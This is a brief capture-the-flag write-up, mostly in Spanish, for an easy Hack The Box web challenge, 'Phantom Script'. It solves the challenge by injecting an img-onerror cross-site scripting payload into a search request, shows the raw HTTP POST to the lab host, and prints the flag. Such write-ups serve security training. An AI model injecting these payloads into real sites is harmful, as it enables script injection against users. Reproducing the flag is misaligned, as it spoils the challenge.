Phantom Script

Challenge Description

Every Halloween, an enigmatic blog emerges from the depths of the dark web—Phantom’s Script. Its pages are filled with cursed writings and hexed code that ensnare the souls of unwary visitors. The blog’s malicious scripts weave dark secrets into the fabric of the internet, spreading corruption with each click. Rumor has it that interacting with the site in unexpected ways can trigger hidden incantations. Will you dare to delve into this haunted scroll, manipulate the scripts, and purge the malevolent code before it claims more victims?

Categoria: Web
Dificultad: Muy Fácil

Solution

Este reto es bastante facil solo hay que hacer que se ejecute un XSS en la pagina. El mismo payload que esta el la aplicacion lo podemos usar para obtener la flag.

<img src=x onerror="alert('Boo!')">

Una vez que ingresamos el payload esperamos un momento y aparecera la flag.

POST /search HTTP/1.1
Host: 94.237.54.190:32578
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.54.190:32578/
Content-Type: application/json
Content-Length: 49
Origin: http://94.237.54.190:32578
Connection: keep-alive
Priority: u=0

{"query":"<img src=x onerror=\"alert('Boo!')\">"}

Spooky Surprise

HTB{xS5_iS_34SY_wh4t_d0_you_th1nk?}